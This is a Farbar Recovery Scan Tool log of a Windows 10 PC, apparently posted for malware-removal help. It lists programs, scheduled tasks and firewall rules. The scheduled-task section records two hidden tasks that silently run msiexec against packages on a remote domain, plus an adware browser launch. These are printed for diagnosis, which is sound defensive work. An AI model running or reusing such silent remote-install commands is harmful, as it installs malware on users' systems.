VIRY.CZ

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 08.11.2018
Ran by MeGret-TPC (10-11-2018 16:22:34)
Running from C:\Users\MeGret-TPC\Desktop
Windows 10 Pro Version 1803 17134.165 (X64) (2018-06-10 20:30:46)
Boot Mode: Safe Mode (minimal)
==========================================================

==================== Accounts: =============================

Administrator (S-1-5-21-819675408-2753461327-3771956256-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-819675408-2753461327-3771956256-503 - Limited - Disabled)
Guest (S-1-5-21-819675408-2753461327-3771956256-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-819675408-2753461327-3771956256-1005 - Limited - Enabled)
MeGret-TPC (S-1-5-21-819675408-2753461327-3771956256-1001 - Administrator - Enabled) => C:\Users\MeGret-TPC
WDAGUtilityAccount (S-1-5-21-819675408-2753461327-3771956256-504 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Flash Player 31 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 31.0.0.122 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.23) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.23 - Adobe Systems Incorporated)
Aktualizace NVIDIA 2.11.4.1 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Update) (Version: 2.11.4.1 - NVIDIA Corporation) Hidden
Aktualizace produktu Microsoft Office Excel 2007 Help (KB963678) (HKLM-x32\...\{90120000-0016-0405-0000-0000000FF1CE}_ENTERPRISE_{0A1FAC46-B899-421D-B1A2-470896DC45DB}) (Version: - Microsoft)
Aktualizace produktu Microsoft Office Powerpoint 2007 Help (KB963669) (HKLM-x32\...\{90120000-0018-0405-0000-0000000FF1CE}_ENTERPRISE_{5260BB53-C1F7-4A3B-9AEB-3EC9B37FF194}) (Version: - Microsoft)
Aktualizace produktu Microsoft Office Word 2007 Help (KB963665) (HKLM-x32\...\{90120000-001B-0405-0000-0000000FF1CE}_ENTERPRISE_{E68DD413-B834-4923-8181-0A03B7555187}) (Version: - Microsoft)
AMD Software (HKLM\...\AMD Catalyst Install Manager) (Version: 18.10.2 - Advanced Micro Devices, Inc.)
Armored Warfare MyCom (HKU\S-1-5-21-819675408-2753461327-3771956256-1001\...\Armored Warfare MyCom) (Version: 1.185 - My.com B.V.)
Ashampoo Burning Studio 6 FREE v.6.84 (HKLM-x32\...\{91B33C97-3ED1-03EA-A67B-244AA4D7B559}_is1) (Version: 6.8.4 - Ashampoo GmbH & Co. KG)
Aslain's WoT Modpack verze 1.2.0.1.10 (HKLM-x32\...\Aslains_WoT_Modpack_Installer_is1) (Version: 1.2.0.1.10 - Aslain)
Asmedia ASM106x SATA Host Controller Driver (HKLM-x32\...\{DF6C3726-7E53-4772-9763-E9F147769F51}) (Version: 3.1.8.0000 - Asmedia Technology)
ASUS GPU TweakII (HKLM-x32\...\{0075AAC2-EA9F-490E-83F7-5D5F81EB2A43}) (Version: 1.1.7.2 - ASUSTek COMPUTER INC.) Hidden
ASUS GPU TweakII (HKLM-x32\...\InstallShield_{0075AAC2-EA9F-490E-83F7-5D5F81EB2A43}) (Version: 1.1.7.2 - ASUSTek COMPUTER INC.)
ASUS Product Register Program (HKLM-x32\...\{49BE9B8A-E858-4533-A74A-64306C13DB59}) (Version: 1.0.014 - ASUS)
ASUS Product Register Program (HKLM-x32\...\{C87D79F6-F813-4812-B7A9-CCCAAB8B1188}) (Version: 1.0.031 - ASUSTek Computer Inc.)
Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment)
Bigasoft Total Video Converter 5.1.1.6250 (HKLM-x32\...\{A72CE741-1F32-4D79-BFFB-A714375C6750}_is1) (Version: - Bigasoft Corporation)
Branding64 (HKLM\...\{EE2AFCE4-0238-4DE0-A140-1647021627C1}) (Version: 1.00.0001 - Advanced Micro Devices, Inc.) Hidden
calibre 64bit (HKLM\...\{B16F2206-747F-4758-ADA9-76148D2C0C35}) (Version: 3.7.0 - Kovid Goyal)
Catalyst Control Center Next Localization BR (HKLM\...\{E7AA1A02-575C-14C6-FBEF-4BE6D46A5B74}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (HKLM\...\{36EDC500-E4C0-371C-9865-08450415C1E9}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (HKLM\...\{4C2FB7FD-89FD-BA5C-585A-3811F326AD34}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (HKLM\...\{D74218A3-C503-57EF-AC9F-2220082E7ADE}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (HKLM\...\{DA433FCF-90A1-19A5-65A7-FDF82DE4826D}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (HKLM\...\{949F125B-A6CC-5A5E-EEE7-4AC50305C1FA}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (HKLM\...\{20D46801-147B-30AD-7C5A-AC4560A79096}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (HKLM\...\{22C39711-2747-D264-319A-1550BEEAAEC6}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (HKLM\...\{1DBACFDB-5E43-7882-36BD-53526D34BD22}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (HKLM\...\{EB6C44F1-0F78-FE10-BC63-90BA50AB0CE9}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (HKLM\...\{B26D75B8-FAB7-6F8B-767F-BAF975383D91}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (HKLM\...\{A91FC4BF-C1EC-ADCA-79D1-F4F0671F1D60}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (HKLM\...\{ED75A775-03A7-F214-868D-497748707968}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (HKLM\...\{07BFBD5C-2F63-6828-1B61-B41A44113F3B}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (HKLM\...\{E6038D3E-5D87-8DF7-6D05-BE7532C3E73E}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (HKLM\...\{DFAD9DAC-4768-C8BB-4E0E-5239605A9BEA}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (HKLM\...\{FFBFBD1F-B160-A119-7C43-8584FA2E5665}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (HKLM\...\{4D1D5407-9B69-6422-629C-8518A26004A4}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (HKLM\...\{A8379BAB-59A9-C0A3-8BCC-4852EA403692}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (HKLM\...\{24DF617A-CD23-6E6A-126B-23630D2781CE}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (HKLM\...\{83DDDFD8-AD42-72F9-E4F1-5456FDB304C9}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Creative ALchemy (HKLM-x32\...\ALchemy) (Version: 1.45 - Creative Technology Limited)
Creative Audio Control Panel (HKLM-x32\...\AudioCS) (Version: 3.00 - Creative Technology Limited)
Creative Software AutoUpdate (HKLM-x32\...\Creative Software AutoUpdate) (Version: 1.41 - Creative Technology Limited)
Creative Sound Blaster Properties x64 Edition (HKLM-x32\...\Creative Sound Blaster Properties x64 Edition) (Version: 1.03 - Creative Technology Limited)
CrystalDiskInfo 7.8.0 (HKLM-x32\...\CrystalDiskInfo_is1) (Version: 7.8.0 - Crystal Dew World)
GameCenter My.com (HKU\S-1-5-21-819675408-2753461327-3771956256-1001\...\GameCenter) (Version: 4.1464 - My.com B.V.)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 70.0.3538.77 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.17 - Google Inc.) Hidden
ICQ (verze 10.0.12393) (HKU\S-1-5-21-819675408-2753461327-3771956256-1001\...\icq.desktop) (Version: 10.0.12393 - ICQ)
Java 8 Update 181 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180181F0}) (Version: 8.0.1810.13 - Oracle Corporation)
MediaHuman YouTube to MP3 Converter 3.9.9.7 (HKLM-x32\...\MediaHuman YouTube to MP3 Converter_is1) (Version: 3.9.9.7 - MediaHuman)
Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM-x32\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version: - Microsoft)
Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISE) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-819675408-2753461327-3771956256-1001\...\OneDriveSetup.exe) (Version: 18.172.0826.0010 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.14.26429 (HKLM-x32\...\{80586c77-db42-44bb-bfc8-7aebbb220c00}) (Version: 14.14.26429.4 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.10.25008 (HKLM-x32\...\{c239cea1-d49e-4e16-8e87-8c055765f7ec}) (Version: 14.10.25008.0 - Microsoft Corporation)
Minecraft (HKLM-x32\...\{1C16BCA3-EBC1-49F6-8623-8FBFB9CCC872}) (Version: 1.0.3.0 - Mojang)
Mozilla Firefox 63.0.1 (x64 cs) (HKLM\...\Mozilla Firefox 63.0.1 (x64 cs)) (Version: 63.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 63.0.1 - Mozilla)
NAS Starter Utility (HKLM-x32\...\NAS Starter Utility) (Version: - ZyXEL)
NVIDIA Ovladač 3D Vision 388.13 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 388.13 - NVIDIA Corporation)
NVIDIA Ovladač řídící jednotky 3D Vision 352.65 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 352.65 - NVIDIA Corporation)
NVIDIA Ovladače grafiky 388.13 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 388.13 - NVIDIA Corporation)
NVIDIA Systémový software PhysX 9.15.0428 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.15.0428 - NVIDIA Corporation)
OpenAL (HKLM-x32\...\OpenAL) (Version: - )
Ovládací panel NVIDIA 388.13 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.ControlPanel) (Version: 388.13 - NVIDIA Corporation) Hidden
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.18.526.2017 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.8233 - Realtek Semiconductor Corp.)
Samsung Printer Center (HKLM-x32\...\Samsung Printer Center) (Version: 1.0.0.26 - Samsung Electronics Co., Ltd.)
SHIELD Streaming (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_GFExperience.NvStreamSrv) (Version: 7.1.0280 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_ShieldWirelessController) (Version: 2.11.4.1 - NVIDIA Corporation) Hidden
Slovenčina (HKU\S-1-5-21-819675408-2753461327-3771956256-1001\...\Slovenčina) (Version: - )
SpyHunter 5 (HKLM-x32\...\SpyHunter5) (Version: 5.0.30.51 - EnigmaSoft Limited)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Stellar Data Recovery Professional (HKLM-x32\...\Stellar Data Recovery Professional_is1) (Version: 8.0.0.0 - Stellar Information Technology Pvt Ltd.)
TeamSpeak 3 Client (HKU\S-1-5-21-819675408-2753461327-3771956256-1001\...\TeamSpeak 3 Client) (Version: 3.1.7 - TeamSpeak Systems GmbH)
Uninstall Samsung Printer Software (HKLM-x32\...\TotalUninstaller) (Version: 4.0.0.67 - Samsung Electronics CO., LTD.)
Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version: - Microsoft)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.5.1 - VideoLAN)
Vulkan Run Time Libraries 1.0.61.0 (HKLM\...\VulkanRT1.0.61.0) (Version: 1.0.61.0 - LunarG, Inc.) Hidden
Windows Resource Kit Tools - SubInAcl.exe (HKLM-x32\...\{D3EE034D-5B92-4A55-AA02-2E6D0A6A96EE}) (Version: 5.2.3790.1164 - Microsoft Corporation)
WinRAR 5.60 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.60.0 - win.rar GmbH)
WiperSoft 1.1.1143.64 (HKLM\...\{AB1C8C91-4D8E-4C28-80E7-FD135FB90515}}_is1) (Version: 1.1.1143.64 - WiperSoft)
World of Tanks (HKU\S-1-5-21-819675408-2753461327-3771956256-1001\...\{1EAC1D02-C6AC-4FA6-9A44-96258C37C812eu}_is1) (Version: - Wargaming.net)
World of Warcraft (HKLM-x32\...\World of Warcraft) (Version: - Blizzard Entertainment)
XSplit Gamecaster (HKLM-x32\...\{8915913F-E4AF-46C5-B4EF-3535D83BFFDE}) (Version: 2.5.1507.3018 - SplitmediaLabs)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2018-06-24] (Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2018-06-24] (Alexander Roshal)
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files\AMD\CNext\CNext\atiacm64.dll [2018-10-19] (Advanced Micro Devices, Inc.)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\system32\nvshext.dll [2017-10-27] (NVIDIA Corporation)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2018-06-24] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2018-06-24] (Alexander Roshal)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {07280288-DB4D-4C69-A6A0-EC1F1E0FC6CB} - System32\Tasks\CrystalDiskInfo => C:\Program Files (x86)\CrystalDiskInfo\DiskInfo32.exe [2018-09-26] (Crystal Dew World)
Task: {0D7125B3-7656-4619-A37A-395D9A914DC0} - System32\Tasks\{36E954AC-8F78-691F-B718-D4CE7E4BCF08} => "msiexec.exe" /i hxxps://siamoderg.info/biksomt5m1kp.sem /q
Task: {132D8886-4A07-462A-B824-78AF1B6BF888} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2018-10-14] (Google Inc.)
Task: {1EA8098C-25F5-46DE-A412-1C6E1B81EDFC} - System32\Tasks\{63FF5D84-F332-3C55-1873-E2C6DE6F96AA} => "msiexec.exe" -q /package hxxps://siamoderg.info/axqchyoohzpx.tci
Task: {29B99B7C-90C3-4774-9EEF-C7C2C6F89FAE} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1810.5-0\MpCmdRun.exe [2018-10-23] (Microsoft Corporation)
Task: {2D84FD82-F950-4803-B0BE-C1EB93F22EA3} - System32\Tasks\StartDVR => C:\Program Files\AMD\CNext\CNext\dvrcmd.exe [2018-10-19] (Advanced Micro Devices, Inc.)
Task: {4346CC41-CDA3-4C56-A023-850111055F0E} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1810.5-0\MpCmdRun.exe [2018-10-23] (Microsoft Corporation)
Task: {5A5135D8-94BD-4131-9D72-8756CCD8FEA5} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
Task: {65B85F6F-35B3-4459-A179-28255D5B7B25} - System32\Tasks\Microsoft\Windows\HelloFace\FODCleanupTask => C:\WINDOWS\System32\WinBioPlugIns\FaceFodUninstaller.exe [2018-04-12] ()
Task: {6783EA1B-F8CB-4EBD-878B-51DDF41C013A} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2018-10-14] (Google Inc.)
Task: {877C1772-9F30-4BE9-8463-5DF5AA19A3D4} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION
Task: {92146086-56B7-4E0D-9EA3-C78832C285BA} - System32\Tasks\{B4B9A496-1465-614B-42E6-E9FACFD9FDCB} => "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" hxxp://good-journal.net/cl/?guid=nyor7zhu2zo5lt5unen1imu9nond6q8k&prid=1&pid=4_1324_0
Task: {96688FB2-4CE3-4F3D-A584-F314406F8346} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [2018-10-19] (Advanced Micro Devices, Inc.)
Task: {976419D4-FD01-4AB6-80D7-3761E92102BE} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2018-10-14] (Adobe Systems Incorporated)
Task: {99678DB9-056F-4AD4-A601-75B89C7CDA66} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1810.5-0\MpCmdRun.exe [2018-10-23] (Microsoft Corporation)
Task: {C3DC2968-1E50-4BFB-93A2-45DC49F2C8A3} - System32\Tasks\Adobe Flash Player NPAPI Notifier => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_31_0_0_122_Plugin.exe [2018-10-14] (Adobe Systems Incorporated)
Task: {C5DB1688-8B19-4F27-AF9F-967D1A326EBB} - System32\Tasks\ASUS\ASUS Product Register Service => C:\Program Files (x86)\ASUS\APRP\aprp.exe [2015-05-18] ()
Task: {E61B0F9B-0AD8-473F-A64D-A77DF90CB170} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1810.5-0\MpCmdRun.exe [2018-10-23] (Microsoft Corporation)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)

ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Your Software Deals.lnk -> C:\ProgramData\Ashampoo\YourDeals.exe () -> hxxp://linktarget.ashampoo.com/linktarget/?target=marketplace&edition=eid=13472&utm_medium=desktop&x-pos=Metro

==================== Loaded Modules (Whitelisted) ==============

2018-04-12 00:34 - 2018-04-12 00:34 - 000491744 _____ () C:\Windows\System32\InputHost.dll
2018-07-18 23:43 - 2018-07-06 07:55 - 002185728 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2018-10-23 23:42 - 2018-10-23 23:43 - 000183808 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.33.41.0_x64__kzf8qxf38zg5c\SkypeBackgroundHost.exe

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Option => "OptionValue"="1"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2015-07-10 12:04 - 2015-07-10 12:02 - 000000824 _____ C:\WINDOWS\system32\Drivers\etc\hosts

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-819675408-2753461327-3771956256-1001\Control Panel\Desktop\\Wallpaper -> c:\windows\web\wallpaper\windows\img0.jpg
DNS Servers: Media is not connected to internet.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)

==================== MSCONFIG/TASK MANAGER disabled items ==

If an entry is included in the fixlist, it will be removed.

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{E0F5C4B0-52F3-4BE7-A5E1-D7D90246D087}] => (Allow) C:\Program Files (x86)\Samsung\Samsung Printer Center\SamsungPrinterCenter.exe
FirewallRules: [UDP Query User{16F97FBE-AB3C-41AD-A0D4-95769E557C27}C:\program files (x86)\blizzard app\battle.net.8839\battle.net.exe] => (Allow) C:\program files (x86)\blizzard app\battle.net.8839\battle.net.exe
FirewallRules: [TCP Query User{3980848F-3765-4CA2-806E-C5E62A63ECF7}C:\program files (x86)\blizzard app\battle.net.8839\battle.net.exe] => (Allow) C:\program files (x86)\blizzard app\battle.net.8839\battle.net.exe
FirewallRules: [UDP Query User{A18C9094-4D41-405B-99E5-151E42BEB7E4}C:\program files (x86)\zyxel\nas starter utility\nas starter utility.exe] => (Allow) C:\program files (x86)\zyxel\nas starter utility\nas starter utility.exe
FirewallRules: [TCP Query User{6611FD6F-E02D-4655-A19D-4456D09F6587}C:\program files (x86)\zyxel\nas starter utility\nas starter utility.exe] => (Allow) C:\program files (x86)\zyxel\nas starter utility\nas starter utility.exe
FirewallRules: [{D80CDD55-C34A-4BAE-9D8D-4B5091BBDDE3}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe
FirewallRules: [{8A6534E2-584B-411D-B95C-A14226F23EBA}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe
FirewallRules: [UDP Query User{831EAC7B-6A9E-481B-8E11-A2C4E0BA775F}C:\world_of_warships\wowslauncher.exe] => (Allow) C:\world_of_warships\wowslauncher.exe
FirewallRules: [TCP Query User{5B267066-14D4-438C-B04E-48DAF9BAE98C}C:\world_of_warships\wowslauncher.exe] => (Allow) C:\world_of_warships\wowslauncher.exe
FirewallRules: [{5E486191-31A4-4B6F-AE27-A44E21FE0A7E}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{B9D1CEED-53B1-4F6B-89CE-307147795EE9}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{7FD09255-5E88-4394-8BAA-EA49321E3191}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{21C71B61-81AC-4513-82CB-0AB2F6D29920}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{0C506A94-F9FC-4405-A4B1-5A8E88E97C7F}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [TCP Query User{E151925F-5554-4AAB-B888-8BDD2556BFA0}C:\world_of_tanks\worldoftanks.exe] => (Allow) C:\world_of_tanks\worldoftanks.exe
FirewallRules: [UDP Query User{F727C40D-6F40-43FB-A06F-CCC0803E1AD3}C:\world_of_tanks\worldoftanks.exe] => (Allow) C:\world_of_tanks\worldoftanks.exe
FirewallRules: [TCP Query User{CD837059-4171-4FBF-80FC-3FE3A0554DE9}C:\world_of_tanks\wotlauncher.exe] => (Allow) C:\world_of_tanks\wotlauncher.exe
FirewallRules: [UDP Query User{E73DBA2D-D0D7-48D4-9CAB-D7563AB6B47D}C:\world_of_tanks\wotlauncher.exe] => (Allow) C:\world_of_tanks\wotlauncher.exe
FirewallRules: [TCP Query User{C39A4149-F0A9-4F15-A511-678059468061}C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [UDP Query User{8ACA6309-88A5-4516-AD42-0B0386C55E33}C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [{E4A4197D-AEF7-400E-862F-58B5D5A996CC}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{701C4593-ADD4-4AFD-9A47-5F23639592CF}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{BCD18F07-2496-40FB-B3C1-BA0344289276}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{659EA0A5-52BF-4B6A-AF1D-D684D5727C4A}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{29317E3A-4F89-446C-A027-4FC9625BD4FF}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\SpaceEngineers\Bin64\SpaceEngineers.exe
FirewallRules: [{68DFF9FF-8C4F-4A82-B7AF-EE46C7BCBF8C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\SpaceEngineers\Bin64\SpaceEngineers.exe
FirewallRules: [{A7DCB652-04FB-4947-A1F5-21961F5AFA5A}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe
FirewallRules: [{303AA42E-DF64-4683-A1A2-C029C7A8B360}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe
FirewallRules: [TCP Query User{736B4A66-A6A0-4A88-9354-8D9AAF64B2C3}C:\users\megret-tpc\appdata\local\gamecenter\gamecenter.exe] => (Allow) C:\users\megret-tpc\appdata\local\gamecenter\gamecenter.exe
